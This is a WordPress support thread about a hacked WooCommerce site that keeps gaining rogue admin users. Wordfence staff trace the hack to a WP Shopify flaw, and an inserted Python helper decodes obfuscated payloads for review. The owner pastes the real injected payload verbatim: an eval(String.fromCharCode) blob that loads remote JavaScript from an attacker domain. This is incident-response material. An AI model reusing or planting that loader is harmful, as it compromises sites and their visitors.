Title: Admin User creating attack
Last modified: October 3, 2019

---

# Admin User creating attack

 *  Resolved [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * (@saruncloudspring)
 * [6 years, 8 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/)
 * I am facing a new admin user creation attack on one of my WooCommerce sites. The
   admin users are created with the username systemusers and use systemusers@gmailen.com
   as the email address. After the user is created, the admin and the user get new
   user created email notifications. Has anyone here faced this same problem before?
   How can I protect my site from this attack?
 * The first time the user was created, I found one vulnerable plugin on my site from
   a Wordfence scan. I have deleted that plugin now, installed the iThemes Security
   Pro version, and enabled 2FA for admin users, but after that the user has still
   been created 5 times on my site.
 * When I checked the DB, I found the following code in the wp_postmeta table:
 * {“settings”:{“wps_settings_general_products_url”:”””eval(String.fromCharCode(
   32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,9,101,108,101,109,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,32,10,32,32,32,32,101,108,101,109,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,98,101,115,46,98,101,108,97,116,101,114,98,101,119,97,115,116,104,101,114,101,46,99,111,109,47,99,111,114,110,47,102,108,101,120,46,106,115,63,116,112,61,52,39,59,10,32,32,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,32,32,125,41,40,41,59))
   >”
 * In the following document, Wordfence says this type of attack will be protected
   against, but it is not protected. Why is it not protecting, and how does this attack come?
    [https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/](https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/)
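
Added example, not part of the original post and not Wordfence's code: a Python triage helper that decodes `eval(String.fromCharCode(...))` wrappers like the one found in `wp_postmeta` above, so the injected script and any URL it loads can be reviewed without executing it. The function names and sample rows are constructed, `example.invalid` is a placeholder host, and rows are assumed to be exported as `(meta_id, meta_value)` pairs.

```python
import re

# Matches the obfuscation wrapper seen in the post: String.fromCharCode(<decimal list>)
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def decode_charcodes(text):
    """Return the decoded string for every String.fromCharCode(...) call in text."""
    decoded = []
    for match in CHARCODE_RE.finditer(text):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        # Drop values outside the Unicode range instead of raising on junk input.
        decoded.append("".join(chr(c) for c in codes if 0 <= c <= 0x10FFFF))
    return decoded


def triage_rows(rows):
    """rows: iterable of (meta_id, meta_value). Returns one finding per decoded blob."""
    findings = []
    for meta_id, value in rows:
        for script in decode_charcodes(value or ""):
            findings.append({
                "meta_id": meta_id,
                "uses_eval": "eval(" in value.replace(" ", ""),
                "decoded": script,                 # read it, never run it
                "urls": URL_RE.findall(script),    # hosts to look for in proxy/DNS logs
            })
    return findings


def _charcodes(js):
    # Helper used only to build the constructed sample row below.
    return ",".join(str(ord(ch)) for ch in js)


# Constructed sample rows (hypothetical export, not data from the thread).
SAMPLE_JS = "var e=document.createElement('script');e.src='https://example.invalid/x.js';"
SAMPLE_ROWS = [
    (101, '{"settings":{"wps_settings_general_products_url":"eval(String.fromCharCode(%s))"}}'
          % _charcodes(SAMPLE_JS)),
    (102, '{"settings":{"wps_settings_general_products_url":"products"}}'),
    (103, None),  # NULL meta_value
]

if __name__ == "__main__":
    for finding in triage_rows(SAMPLE_ROWS):
        print(finding["meta_id"], finding["uses_eval"], finding["urls"])
```

Rows that produce a finding are the ones to clean or restore from backup; the decoded URLs can be searched for in web server and DNS logs to scope the exposure.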

Viewing 5 replies - 1 through 5 (of 5 total)

 *  Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * (@saruncloudspring)
 * [6 years, 8 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-11996686)
 * Why no response from your side?
 *  Plugin Support [wfphil](https://wordpress.org/support/users/wfphil/)
 * (@wfphil)
 * [6 years, 8 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-12002090)
 * Hi [@saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * I am sorry to hear that you have been hacked.
 * The indicators of compromise that you have mentioned do not match the indicators
   of compromise in our blog post that you linked to.
 * Please follow our complete site cleaning guide here:
 * [https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/](https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/)
 * I have passed your provided information to our threat intelligence team for you.
 *  [WFGerroald](https://wordpress.org/support/users/wfgerald/)
 * (@wfgerald)
 * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-12057642)
 * We haven’t heard back from you in a while, so I’ve gone ahead and marked this
   thread as resolved.
 * Please feel free to open another thread if you have any other issues.
 * Thanks,
 * Gerroald
 *  Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * (@saruncloudspring)
 * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-12057822)
 * I have created a new topic about this issue. The issue is not solved yet; I have
   followed your site cleaning process.
 *  Plugin Support [wfphil](https://wordpress.org/support/users/wfphil/)
 * (@wfphil)
 * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-12121928)
 * Hi [@saruncloudspring](https://wordpress.org/support/users/saruncloudspring/)
 * A custom firewall rule is now available for users of the free version of Wordfence
   that protects against the vulnerability that led to this hack in WP Shopify
   <= 2.0.4.
 * This vulnerability was fixed in the plugin version 2.0.5:
 * [https://wordpress.org/plugins/wpshopify/#developers](https://wordpress.org/plugins/wpshopify/#developers)
 * It is imperative for the security of your site to keep WordPress, your theme 
   and plugins updated.

 * 5 replies
 * 3 participants
 * Last reply from: [wfphil](https://wordpress.org/support/users/wfphil/)
 * Last activity: [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-12121928)
 * Status: resolved